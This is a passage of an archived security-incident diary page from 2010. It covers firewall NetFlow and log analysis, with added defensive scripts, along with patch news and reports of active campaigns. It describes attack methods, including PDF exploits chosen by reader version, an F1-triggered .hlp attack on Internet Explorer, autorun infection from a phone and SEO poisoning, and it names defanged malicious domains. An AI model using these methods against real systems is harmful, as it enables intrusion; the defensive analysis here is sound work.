Jackpot!  What we have here is a number of stations, all running peer-to-peer applications (each line is a different target ip address).  This was no surprise two days after the Oscars, but this is another clear violation of this Organization’s Acceptable Use Policy, and one of the best ways to introduce malware into the Organization as well.  Not only that, it takes LOTS of bandwidth and LOTS of address translation resources (aka memory) at the firewall – sessions like this can easily affect Internet performance for the entire corporation.   Depending on the country, this might be a great way to get sued under copyright infringement as well !

Now let’s look at the data a bit differently – let’s look at session totals over the last hour by IP address, sorted by volume.



Take a look at that first line – that’s a station on the inside, using an “anonymizer” proxy out on the internet (tcp/8080).  OUCH – that’s someone who is not only violating policy, they’re knowingly trying to cloak their actions.  They’re also the heaviest user in the last hour.  Again, we’re 2 days after the Oscars, so it’s no mystery what that 200mb session is all about.  But on any other week, there would be a real chance of finding some “call the cops” type illegal activity going on with proxy sessions like this.

Needless to say, after this short exploration, we're working on an egress filter for this firewall.  The "we trust our users" position ignores the fact that even if you trust your users, you are also trusting your users' malware, and, as you can see from this, you can't trust (all of) your users either.

You can see from this that using a good Netflow Collector application will give you a great window into the traffic transiting your firewall or router, pretty much as granular as you want to be.  We collected all this data in about 10 minutes, running a tutorial for the IT group at the same time.  I still use grep, awk and the rest more than I use Netflow, but a good Netflow app can give you nice management style reports, historical queries into your router or firewall data and really granular analysis with almost no time investment.  If you're not a "CLI person", Netflow can go a long way towards getting you really deep into your firewall activity.
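The three views walked through above (bytes per TCP application with an unknown-port bucket, the SMTP drill-down that exposed a second sender, and session totals by address that surfaced the tcp/8080 proxy user) reduce to a few aggregations over flow records. The following is an added example, not code from the diary or from any collector product; the flow records are constructed to resemble the screenshots (a mail server at 10.0.0.73, a stray SMTP sender at 10.0.0.233, peer-to-peer traffic on unrecognised ports, and one heavy session to port 8080), and the port-to-application table and the list of proxy ports are assumptions.

```python
from collections import defaultdict

# Constructed flow records from the firewall's inside interface:
# (src_ip, dst_ip, proto, src_port, dst_port, bytes). Not the diary's client data.
FLOWS = [
    ("10.0.0.73",  "198.51.100.25", "tcp", 51234, 25,      4_200_000),  # mail server -> SMTP
    ("10.0.0.73",  "198.51.100.26", "tcp", 51235, 25,      3_900_000),
    ("10.0.0.233", "203.0.113.9",   "tcp", 49152, 25,        120_000),  # a workstation sending SMTP
    ("10.0.0.15",  "203.0.113.80",  "tcp", 49200, 80,      1_500_000),
    ("10.0.0.16",  "203.0.113.81",  "tcp", 49201, 443,       900_000),
    ("10.0.0.42",  "192.0.2.77",    "tcp", 49300, 6881,   60_000_000),  # unrecognised ports (P2P-like)
    ("10.0.0.42",  "192.0.2.78",    "tcp", 49301, 51413,  45_000_000),
    ("10.0.0.99",  "192.0.2.200",   "tcp", 49400, 8080,  200_000_000),  # proxy on tcp/8080
]

# Assumed port-to-application table; anything else lands in the "TCP_App" bucket.
KNOWN_TCP_APPS = {22: "SSH", 25: "SMTP", 80: "HTTP", 110: "POP3", 143: "IMAP", 443: "HTTPS"}
AUTHORIZED_SMTP_SENDERS = {"10.0.0.73"}   # the site's mail server (assumed)
PROXY_PORTS = {8080, 3128, 1080}          # common proxy / anonymizer ports (assumed)


def bytes_by_app(flows):
    """The 'TCP applications' view: bytes per destination application."""
    totals = defaultdict(int)
    for _src, _dst, proto, _sport, dport, nbytes in flows:
        if proto == "tcp":
            totals[KNOWN_TCP_APPS.get(dport, "TCP_App")] += nbytes
    return dict(totals)


def senders_to_port(flows, port):
    """Bytes per source address for flows to one destination port (the SMTP drill-down)."""
    totals = defaultdict(int)
    for src, _dst, _proto, _sport, dport, nbytes in flows:
        if dport == port:
            totals[src] += nbytes
    return dict(totals)


def unexpected_smtp_senders(flows):
    """Inside hosts sending SMTP that are not the known mail server."""
    return set(senders_to_port(flows, 25)) - AUTHORIZED_SMTP_SENDERS


def tcp_app_destinations(flows):
    """Drill-down of the TCP_App bucket: (src, dst, dport, bytes) per unrecognised port."""
    return [(src, dst, dport, nbytes) for src, dst, proto, _sport, dport, nbytes in flows
            if proto == "tcp" and dport not in KNOWN_TCP_APPS]


def top_talkers(flows, n=3):
    """Session totals per source address, largest first."""
    totals = defaultdict(int)
    for src, *_rest, nbytes in flows:
        totals[src] += nbytes
    return sorted(totals.items(), key=lambda kv: kv[1], reverse=True)[:n]


def proxy_users(flows):
    """Source addresses with flows to common proxy ports, and the bytes moved."""
    totals = defaultdict(int)
    for src, _dst, _proto, _sport, dport, nbytes in flows:
        if dport in PROXY_PORTS:
            totals[src] += nbytes
    return dict(totals)


if __name__ == "__main__":
    print("by application:", bytes_by_app(FLOWS))
    print("SMTP senders:", senders_to_port(FLOWS, 25))
    print("unexpected SMTP senders:", unexpected_smtp_senders(FLOWS))
    print("TCP_App drill-down:", tcp_app_destinations(FLOWS))
    print("top talkers:", top_talkers(FLOWS))
    print("proxy users:", proxy_users(FLOWS))
```

Each function is one of the report screens in miniature: the collector's web front-end does exactly these group-by operations over the exported records, which is why a handful of config lines on the device plus a collector gives the same answers as an afternoon with awk. The port table is where policy lives; a port missing from it is not malicious, it is simply unclassified, and the drill-down is what turns "TCP_App" into a list of hosts and destinations to look at.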

 

=============== Rob VandenBrink, Metafore ==============

10 Comments

Published: 2010-03-09

March 2010 - Microsoft Patch Tuesday Diary

 

 Overview of the March 2010 Microsoft Patches and their status.

#          Affected                                    Contra Indications  Known Exploits      Microsoft rating                 ISC rating(*)
                                                                                                                                clients    servers
MS10-016   Vulnerability in Windows Movie Maker        KB 975561           no known exploits   Severity: Important              Important  Important
           Could Allow Remote Code Execution                                                   Exploitability: 1
           Moviemaker: CVE-2010-0265
MS10-017   Vulnerabilities in Microsoft Office Excel   KB 980150           no known exploits   Severity: Important              Critical   Important
           Could Allow Remote Code Execution                                                   Exploitability: 1,2,1,1,2,1,1
           Excel: CVE-2010-0257, CVE-2010-0258,
           CVE-2010-0260, CVE-2010-0261,
           CVE-2010-0262, CVE-2010-0263,
           CVE-2010-0264

We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them

--
John Bambenek
bambenek at gmail /dot/ com

 

1 Comments

Published: 2010-03-09

Vodafone Android Phone: Complete with Mariposa Malware

Panda Security has a post up on one of their employees buying a brand new Android phone from Vodafone and discovering it was spreading Mariposa. It didn't infect the phone proper, but it did have autoexec.inf and autoexec.bat files designed to infect whatever Windows machine the phone was plugged into via USB cable. Unlike the Energizer story from yesterday, this one is happening now. Standard USB defenses apply: don't automatically execute autoexec.bat/inf files from USB devices. This Microsoft KB article discusses how to disable the "Autoplay" functionality that leads to this problem.

This leads to the interesting question: why not just infect the phones? The technology is certainly there to write phone-specific malware. We likely won't see mass infection of phones (or, even better from the attacker's point of view, a cell-phone botnet) until commerce is much more common on phones. Malware is driven by the desire for profit, and once it becomes profitable we'll see exploitation. The problem is that these slimmed-down devices make it difficult to build security in; only a few cell phone types even have the option of antivirus software. The clock is ticking on that threat.

--
John Bambenek
bambenek at gmail /dot/ com

4 Comments

Published: 2010-03-09

Energizer Malware

We received several emails today about the US-CERT analysis of Trojan horse software found in an application designed for a battery recharger.  Our assessment is that due to the dates involved (2007 and 2008) this is likely related to the rash of malware we reported a couple of years ago that was found on digital photo frames, iPods, GPS devices, and other consumer products.  If any of our readers have any additional technical information or observations to share about this case, please use the comment feature below.

Marcus H. Sachs
Director, SANS Internet Storm Center

1 Comments

Published: 2010-03-08

SEO poisoning on TV show

An ISC reader (thanks, Paul) notified us about a new SEO (Search Engine Optimization) poisoning attack doing the rounds in the last 6-8 hours. We have talked about this kind of attack in the past, although those were mainly focused on other hot technology topics, major tragedies, or events. This time, the topic used to get to the top of the search engine results page is a TV reality show. Specifically, a TV show called "Billy the Exterminator" premieres in the US tonight. The "wiki billy the exterminator" search term in Google (USE WITH CAUTION: http://www.google.com/search?q=wiki+billy+the+exterminator) shows the poisoning attack.

The compromised sites present the following URL format: /FILE.php?PARAM=billy%20the%20exterminator%20wiki, where FILE is most commonly a three-letter file name and PARAM is an input parameter (one or multiple characters). The affected sites are used for a drive-by attack: victims are shown a fake AV warning that pushes them to download a piece of malware: "Warning! Your computer is vulnerable to malware attacks. We recommend you to check your system immediately. Press OK to start the process now.".

If you manage, or know someone who manages, any of the affected sites, we would like to get details about the compromise in order to confirm the vulnerability exploited to get into them (likely PHP related). Please send details through our contact page.
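An added detection example, not part of the original diary, that scans web server access logs for the URL pattern described above. The log lines are a constructed Apache combined-format sample, not from a real compromised site; the regex generalizes the pattern slightly (a 2-4 character PHP file name and any percent-encoded multi-word keyword, not only the "Billy the Exterminator" term), which is an assumption on my part, as are the function names.

```shell
#!/bin/sh
# Constructed Apache combined-format access log lines (sample data, not a real site).
SAMPLE_ACCESS_LOG="$(cat <<'EOF'
10.0.0.1 - - [08/Mar/2010:14:02:11 +0000] "GET /abc.php?q=billy%20the%20exterminator%20wiki HTTP/1.1" 200 5123 "http://www.google.com/search?q=wiki+billy+the+exterminator" "Mozilla/5.0"
10.0.0.2 - - [08/Mar/2010:14:02:40 +0000] "GET /abc.php?q=billy%20the%20exterminator%20wiki HTTP/1.1" 200 5123 "http://www.google.com/search?q=billy+the+exterminator" "Mozilla/5.0"
10.0.0.3 - - [08/Mar/2010:14:03:05 +0000] "GET /xyz.php?ab=billy%20the%20exterminator%20wiki HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
10.0.0.4 - - [08/Mar/2010:14:03:30 +0000] "GET /index.php?page=about HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
10.0.0.5 - - [08/Mar/2010:14:04:12 +0000] "GET /abc.php?q=some%20other%20show%20wiki HTTP/1.1" 200 5100 "http://www.bing.com/search?q=some+other+show+wiki" "Mozilla/5.0"
EOF
)"

# Print request paths that match the poisoning pattern: a short PHP file name
# (assumed 2-4 alphanumerics), a single query parameter, and a percent-encoded
# multi-word value. Reads combined-format log lines on stdin; $7 is the path.
seo_poison_paths() {
    awk '{ print $7 }' |
    grep -E '^/[A-Za-z0-9]{2,4}\.php\?[A-Za-z0-9_]+=[A-Za-z0-9]+(%20[A-Za-z0-9]+)+$'
}

# Count hits per (file, decoded keyword) so the campaign's search terms stand out.
# Output lines look like: "<count> /abc.php billy the exterminator wiki".
seo_poison_summary() {
    seo_poison_paths |
    sed -e 's/%20/ /g' -e 's|^\(/[^?]*\)?[^=]*=|\1 |' |
    sort | uniq -c | sort -rn
}

# Usage: run the summary over the constructed sample.
printf '%s\n' "$SAMPLE_ACCESS_LOG" | seo_poison_summary
```

The referrer field is worth keeping an eye on as well: in a real campaign the matching requests arrive almost exclusively from search engine result pages, which is a second signal that separates poisoned traffic from ordinary visitors.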

--
Raul Siles (www.raulsiles.com)
Taddong is coming soon...

1 Comments

Published: 2010-03-08

Samurai WTF 0.8

A new version of the Samurai WTF (Web Testing Framework) distribution, version 0.8, has been released this weekend. As a member of the main development team, I'm proud to see that Samurai WTF is becoming the preferred environment for web application security testing.

Apart from being the first Live DVD version (1.7GB), versus the previous Live CD versions (<700MB in size), this new version includes multiple new features:
- The Samurai WTF Firefox add-ons collection: https://addons.mozilla.org/en-US/firefox/collection/samurai.
- An extensive layout clean-up.
- New SVN capabilities to update the most actively developed web testing tools.
- Metasploit (which allows its integration with other tools, like sqlmap or sqlninja).
- The addition of two well-known vulnerable web apps for training and testing purposes, DVWA and Mutillidae.
- Plus new tools and tool updates (see the Changelog within the Live DVD).

I definitely recommend you try it and get the most out of this open-source project when evaluating the security of your web applications and sites.

You can gather more details about the Samurai WTF from its main web page, http://samurai.inguardians.com, an OWASP presentation I did in December (available at http://www.radajo.com/2009/12/assessing-and-exploiting-web.html), and download the new version from Sourceforge: http://sourceforge.net/projects/samurai/.

Please, if you are a regular user or want to try it, share your comments and improvements through the project mailing list (http://sourceforge.net/mail/?group_id=235785).
--
Raul Siles (www.raulsiles.com)
Taddong is coming soon...

3 Comments

Published: 2010-03-07

DHS issues Cybersecurity challenge

Have some great security awareness ideas? Feel like no one hears your ideas? Then you will be interested in a new contest/challenge issued by the Dept. of Homeland Security. The invitation is open to people from industry and even individuals. I know personally from 11 years in this industry talking to national and state level government, as well as Fortune 50 and small businesses, that the missing link between our ISMS (Information Security Management System) and security incidents is the need to increase user awareness. Some of the handlers were saying that if we can have public interest messages on forest fires, then surely we should use this same platform to recommend best practices for all computer users!

The program is open to anyone, and the closing date is April 30, 2010.  The winners will be invited to an event in Washington D.C. in late May or early June to partner with the DHS to lead in the planning and launch of the Cyber Security Awareness month in October.  Get more information on this contest here:  www.dhs.gov/files/cyber-awareness-campaign.shtm

Even if you don't enter, there is still time to get started planning your event for this year!  I'd love to hear your ideas for your 2010 campaign (if you aren't going to enter). 

Mari Nichols

Handler on Duty

0 Comments

Published: 2010-03-06

Integration and the Security of New Technologies

The topic of deployment of new technology in an enterprise, and how to prepare to secure that technology, is one that has come up for discussion recently. Part of the discussion was a question asked by a reader today about the deployment of a new system, offering a number of services via the web, and the security of those systems and services. So my question for comment is "How do we secure this?"

In my experience, it is a combination of the Engineering, Testing & Installation team(s) and the Site Security team(s) working together during the deployment and initial operational phases of any system. The Security teams are oftentimes the firsthand and best source of knowledge for the system, or systems, being deployed. If the Security teams are contracted for the installation and testing of the new technology, then they typically have a reliable way of getting information to/from the developers. The Site Security teams need to be involved early on in the engineering phase, to ensure the site's current Information Security Infrastructure will readily support the incoming technologies. Most vendors today can supply deployment and integration guides that the Security teams can provide to the site early on as well.

I welcome your comments,

tony d0t carothers @t isc.sans.org

1 Comments

Published: 2010-03-05

False scare email proclaiming North Korea nuclear launch against Japan

Reader Jim informed us about a scare email tactic that is trying to entice users to open a malicious zip file. The email looks very well done and is supposedly written by the US Department of National Intelligence.  The email basically warns that North Korea has launched a missile at Japan (Okinawa) and that severe destruction has been reported.  At the end of a massive list of US agencies, there is a link to a report.zip file with an executable that doesn't seem to have much virus coverage at the moment.  Only Symantec is identifying it as Suspicious.Insight.  Here is another forum discussing this activity today: http://forums.malwarebytes.org/index.php?showtopic=42360.

It is a shame that Global Thermonuclear War is being used to drop lame viruses.

-Kyle Haugsness

 

3 Comments

Published: 2010-03-05

What is your firewall log telling you - responses

Responses to our earlier diary entries regarding firewall log parsing (story1 and story2) have been trickling in. 

Reader Matthias has some small awk/shell scripts for parsing iptables log files that he shared here: http://sister-shadow.de/hotlink/isc/log-scripts.tar.gz

And reader Christian recommends using Prelude LML (log monitor lackey): http://www.prelude-technologies.com/en/welcome/index.html

Update #1: An anonymous reader also suggests http://www.loganalysis.org/ .

-Kyle Haugsness

2 Comments

Published: 2010-03-05

Javascript obfuscators used in the wild

I have been doing some research on Javascript obfuscators.  Various handlers have done stories in the past on how to reverse engineer obfuscated javascript that does evil things.  But I would be interested in hearing what kind of obfuscators people have been finding being used in the wild.  Are you able to identify the obfuscator just by looking at it?  What are the hardest off-the-shelf obfuscators to reverse-engineer?  I will collect responses and post them throughout the day (unless you wish the information to remain private).

-Kyle Haugsness

2 Comments

Published: 2010-03-05

Unpatched Opera 10.50 and below code execution vulnerability

Several mailing lists and readers (Juha-Matti) are reporting publicly available exploits for Opera 10.50 for Windows and below. There actually seem to be at least two different vulnerabilities, both unpatched at this time. One of them appears to be a DoS resulting in a browser crash, but the other looks like it will allow full code execution. The vulnerability finders indicate that these issues also exist in previous versions of Opera. These are fairly serious, and until Opera patches them you may be well advised to stop using the browser for the time being.

http://secunia.com/advisories/38820/

http://www.vupen.com/english/advisories/2010/0529

 

-Kyle Haugsness

1 Comments

Published: 2010-03-04

salefale-dot-com is bad

We are currently analyzing several reports on sites that contain malicious iframes from google-analitics-dot-net (no, this has nothing to do with the real Google). The iframes redirect to several sub-domains under salefale-dot-com, where a big pile of exploits lurks. All 8 exploits that we identified so far download the same EXE in the end (Virustotal Link). The pretty good coverage that this fresh file already has indicates that many people must have tripped over those malicious iframes today and sent them in to the AV companies.

The script dished out by salefale-dot-com politely checks which version of Adobe Reader/Acrobat is installed, and then serves up the PDF exploit most digestible to the target at hand, ranging from the old "Collab.getIcon" (CVE-2009-0927) to the recent "media.newPlayer" (CVE-2009-4324) vulnerability. This version fingerprinting is also why an up-to-date reader and an old one fetching the same URL will receive different payloads, so a single sample from one client does not tell you everything the site serves.

google-analitics-dot-net, by the way, has interesting whois information ... the domain is registered to ??? in the state of Taliban.  <sarcasm> Some domain registrars are obviously doing their utmost to catch bogus domain registrations </sarcasm>.

A special thanks to ISC reader Tom for his detailed report, and to Jan B for spotting this one early on!

3 Comments

Published: 2010-03-03

What is your firewall log telling you - Part #2


Following up on Mark Hofman's earlier post ("What is your firewall log telling you"), here's some tips on how a Unix command line can be used to cut a big firewall log file down to size for quick analysis.

In the installation that I use as an example here, the firewall sits between the internal network and the Internet, and only allows the internal proxy server to talk to the Internet. PCs on the internal network must surf via the proxy, and are barred from making direct connections through the firewall. This doesn't mean though that the PCs won't try -- a lot of malware, chat software, file sharing tools, etc. are proxy-aware, but frequently also try a "direct" connection first. Looking at the direct connections that internal PCs attempt to make is a good way to find out what's happening on the network...

Let's assume we have a Checkpointish log format like this:

time=2010-03-02 23:59:57 action=drop orig=192.168.1.103 i/f_dir=inbound i/f_name=eth1c0 has_accounting=0 product=VPN-1 & FireWall-1 policy_name=INTERNET src=1.2.3.4 s_port=37586 dst=3.4.5.6 service=3384 proto=tcp rule=16 xlatesrc=8.9.10.11 xlatesport=57517 xlatedport=0 NAT_rulenum=4 NAT_addtnl_rulenum=internal

Let's further assume that we have already checked the connections that the firewall accepts, and that we now only want to look at traffic the firewall blocked. The easiest way to accomplish this is by suppressing all log lines that contain the string "action=accept", as follows:

| grep -v "action=accept"

This is where things get interesting. To make sense of the huge volume of log lines, we have to somehow "boil them down" to the essentials. Piping a log line into a command like this

| cut -d" " -f14-16

will just give us fields 14-16 of each log line, with "space" used as separator (-d, delimiter). Your log line format might vary of course, so just count and adapt. In the above example, fields 14-16 amount to "dst=3.4.5.6 service=3384 proto=tcp", so this gives us the destinations that our internal PCs attempt to talk to. Applying this "cut" command to the entire log will still give us the same number of lines as we had in the original log, but adding a command like

| sort | uniq -c | sort -rn

combines and counts all identical entries (uniq -c, which needs sorted input), and then puts the lines with the highest counts first (sort -n: numerically, -r: in reverse order). The result on the firewall log that I used as example here was

36642 dst=194.186.121.68 service=80 proto=tcp
 8616 dst=62.105.135.101 service=80 proto=tcp
 2641 dst=192.168.0.1 service=657 proto=udp
[...]

Once at this stage, the next step is to find out what these destinations are, and which systems we have on the network that are trying to talk to them. In this example, a quick check of "whois" reveals that both the top two IP addresses are in Russia ... and the topmost address had 36642 connection attempts from our network in a single day. Hmmm.....

Extending our original "cut" command above into

| cut -d " " -f12,14-16

now also includes the "source address" (field 12) in the output. If we now filter (grep) the output to only contain the first of the above Russian IPs, the entire command line becomes

cat logfile.20100302 | grep -v "action=accept" | cut -d" " -f12,14-16 | grep "194.186.121.68" | sort | uniq -c | sort -rn

36424 src=192.168.140.108 dst=194.186.121.68 service=80 proto=tcp
  218 src=192.168.143.19 dst=194.186.121.68 service=80 proto=tcp


which shows two clients on our internal network (192.168.x) that try to talk to this outside IP address.
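The whole pipeline above, as an added shell example that is not part of the original diary: rather than counting fields by position with cut, it pulls the src, dst, service and proto values by key name with awk, so the extraction survives the variable-width product field ("VPN-1 & FireWall-1" is three space-separated tokens) and the position shifts the text warns about. The log lines are a constructed sample using the diary's own example addresses, not real traffic; the function names are mine.

```shell
#!/bin/sh
# Constructed Checkpoint-style log sample (not real traffic). The third line has a
# one-token product field, which shifts every later field by two positions and
# would make a positional "cut -f14-16" return the wrong columns for that line.
SAMPLE_LOG="$(cat <<'EOF'
time=2010-03-02 23:59:57 action=drop orig=192.168.1.103 i/f_dir=inbound i/f_name=eth1c0 has_accounting=0 product=VPN-1 & FireWall-1 policy_name=INTERNET src=192.168.140.108 s_port=37586 dst=194.186.121.68 service=80 proto=tcp rule=16
time=2010-03-02 23:59:57 action=drop orig=192.168.1.103 i/f_dir=inbound i/f_name=eth1c0 has_accounting=0 product=VPN-1 & FireWall-1 policy_name=INTERNET src=192.168.140.108 s_port=37587 dst=194.186.121.68 service=80 proto=tcp rule=16
time=2010-03-02 23:59:58 action=drop orig=192.168.1.103 i/f_dir=inbound i/f_name=eth1c0 has_accounting=0 product=FireWall-1 policy_name=INTERNET src=192.168.140.108 s_port=37588 dst=194.186.121.68 service=80 proto=tcp rule=16
time=2010-03-02 23:59:58 action=drop orig=192.168.1.103 i/f_dir=inbound i/f_name=eth1c0 has_accounting=0 product=VPN-1 & FireWall-1 policy_name=INTERNET src=192.168.143.19 s_port=41002 dst=194.186.121.68 service=80 proto=tcp rule=16
time=2010-03-02 23:59:59 action=drop orig=192.168.1.103 i/f_dir=inbound i/f_name=eth1c0 has_accounting=0 product=VPN-1 & FireWall-1 policy_name=INTERNET src=192.168.140.108 s_port=37590 dst=62.105.135.101 service=80 proto=tcp rule=16
time=2010-03-02 23:59:59 action=accept orig=192.168.1.103 i/f_dir=inbound i/f_name=eth1c0 has_accounting=0 product=VPN-1 & FireWall-1 policy_name=INTERNET src=192.168.1.50 s_port=50111 dst=194.186.121.68 service=80 proto=tcp rule=3
EOF
)"

# Top blocked destinations: "<count> dst=... service=... proto=...", highest first.
# Log lines on stdin. Fields are located by key name, not by position.
top_dropped_dsts() {
    grep -v 'action=accept' |
    awk '{
        split("", f)                      # clear the key/value map per line
        for (i = 1; i <= NF; i++) {
            split($i, kv, "=")            # kv[1] is the key, e.g. "dst"
            f[kv[1]] = $i
        }
        if (f["dst"] != "") print f["dst"], f["service"], f["proto"]
    }' | sort | uniq -c | sort -rn
}

# Internal sources talking to one blocked destination, highest count first.
# $1 = destination IP (exact match on the dst key, so "." is not a wildcard
# and 194.186.121.68 does not also match 194.186.121.680). Log on stdin.
sources_for_dst() {
    grep -v 'action=accept' |
    awk -v want="$1" '{
        split("", f)
        for (i = 1; i <= NF; i++) {
            split($i, kv, "=")
            f[kv[1]] = $i
        }
        if (f["dst"] == "dst=" want) print f["src"], f["dst"], f["service"], f["proto"]
    }' | sort | uniq -c | sort -rn
}

# Usage: the two steps from the diary, run over the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | top_dropped_dsts
printf '%s\n' "$SAMPLE_LOG" | sources_for_dst 194.186.121.68
```

Two things the key-based version fixes compared with the one-liner: a plain grep "194.186.121.68" treats each dot as "any character" and matches the address as a substring anywhere on the line (including in a src= or xlatesrc= field), and cut by field number silently returns the wrong columns on any line whose earlier fields contain an extra space. On a real log, replace the printf with cat logfile.20100302.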

Now, the next step is to isolate the process(es) on these two systems that initiate the connections. If the two clients run on Windows, the best bet here is to use "tcpview" from the SysInternals suite. Some patience is called for - since the connection gets dropped by our firewall, it will not be listed as an active (ESTABLISHED) connection. But watching tcpview should eventually show a process that tries to open an outbound connection ("SYN_SENT"). Once the process is known, the "What Does Your Firewall Log Tell You" portion of this investigation is over, and standard malware fighting procedures kick in. SysInternals "ProcessExplorer" is a good next step to learn more about the potentially malicious process.

What is your favorite way to quickly carve out interesting tidbits from huge firewall logs? Let us know!

1 Comments

Published: 2010-03-03

Reports about large number of fake Amazon order confirmations

A couple of readers wrote about a flood of fake Amazon.com order confirmations they are receiving. The e-mail claims to originate from Amazon.com, and attempts to trick the user into clicking on a link which will then lead to obfuscated JavaScript and malware.

This particular attack appears to be a new version of similar e-mails we have seen over the last week or so. The new version uses larger e-mail messages, which appear to be composed with Microsoft Word.

The text is still pretty concise. As a sample:

-----
Dear Customer,

Your order has been sucessfully confirmed. For your reference, here's a summary of your order:

You just confirmed order #2341-23483720-38123

Status: CONFIRMED

-----

At the end of the e-mail follows a link to a malware site, labeled "ORDER INFORMATION".

A number of different domains have been seen used so far.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

13 Comments

Published: 2010-03-03

MS10-015 re-released

Microsoft has re-released the patch for MS10-015 (http://blogs.technet.com/msrc/archive/2010/03/02/update-ms10-015-security-update-re-released-with-new-detection-logic.aspx).  Reader Brian noticed that the patch in his WSUS had expired today and correctly surmised that an update was imminent.  

A tool has also been released that will scan machines for compatibility with the new patch.  This is also available from the above link.  

The update will not be applied to systems on which the original patch is already installed. 

Mark

2 Comments

Published: 2010-03-02

Updates for your consumption this morning (Bind, Opera)

Okay, so it's morning in the US, so I thought I'd get the US's day started by posting a couple updates that were brought to our attention this morning.

First off is Bind:

Bind 9.6.2 is now available here: ftp://ftp.isc.org/isc/bind9/9.6.2/bind-9.6.2.tar.gz

There have been a ton of updates to Bind since 9.6.0, so make sure you check the release notes here: http://isc.org/files/release-notes/962.html

Second is Opera:

It looks like Opera 10.50 for Windows has been released. (10.50 for Mac is still in beta).  Check out the Changelog for 10.50 here: http://www.opera.com/docs/changelogs/windows/1050/

Then get your fresh download here: http://www.opera.com/browser/download/?os=windows&ver=10.50&local=y

 

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler

0 Comments

Published: 2010-03-01

IE 0-day using .hlp files

A PoC has been posted which outlines how VBScript on a web page can make Internet Explorer hand a malicious .HLP file to winhlp32.exe on Windows 2000, Windows XP SP2/SP3 and Windows 2003 SP2. A malicious page is needed to trick the user into pressing the F1 key, which invokes the help function; arbitrary commands can then be executed. The attack works in IE 6, 7 and 8.

One workaround is to disable Active Scripting in Internet Explorer. A second workaround is to restrict the permissions on winhlp32.exe, as shown in the advisory.

Microsoft has posted an advisory  here  www.microsoft.com/technet/security/advisory/981169.mspx

Whilst we haven't seen any attacks based on this just yet, if you do please let us know. 

Mark 

(Thanks David & Pholder)

 

3 Comments

Published: 2010-03-01

AS/NZ "Online Offensive - Fight fraud online" week March 1-7

 The Australian Competition & Consumer Commission (ACCC) released a report on online fraud today (http://www.accc.gov.au/content/index.phtml/itemId/916075) as part of their awareness campaign "Online Offensive - Fight Fraud Online" which runs March 1-7.  The programme runs every year in Australia and New Zealand and aims to educate people about online scams and is a cooperative effort between government and private enterprise. The idea is to provide non-IT people with some of the tools that they can use to recognise the various schemes. We all know someone who has been taken in. 

So if you are helping out with Seniors computing courses, or other community computing awareness course, providing some in house training, or even performing internet help desk duties for family members, then you may find some of this information useful.

The following sites all have information on the different scams online: 

  • www.scamwatch.gov.au - The ACCC also runs the scamwatch website that has a lot of easy to understand information about the various scams doing the rounds.  
  • www.fido.gov.au - The Australian Securities and Investments Commission (ASIC) has their Fido web site, look under scams & warnings for information.  
  • www.lookstoogoodtobetrue.com - is a good resource for easily digestible scam information.  (thanks Tim)
  • www.ftc.gov/bcp/menus/consumer/tech/scams.shtm - The FTC site has scam information. It is written in governmentese so you may need to translate, but nonetheless some good information. 
  • www.ftc.gov/bcp/menus/consumer/tech/scams.shtm - A second FTC web site with some more specific information
  • www.fbi.gov/cyberinvest/escams.htm - This FBI page has information on some of the newer scams. 
  • www.usa.gov/Citizen/Topics/Internet_Fraud.shtml - This internet fraud page provides information on where to report fraud as well as some general information.  
  • www.oft.gov.uk/advice_and_resources/small_businesses/scams/ - Some basic info on this UK web site regarding scams
  • www.onguardonline.gov - An interactive site providing some good information to help protect internet users

If you have links to government sites specifically related to scams and fraud let us know.  

Mark 
 

0 Comments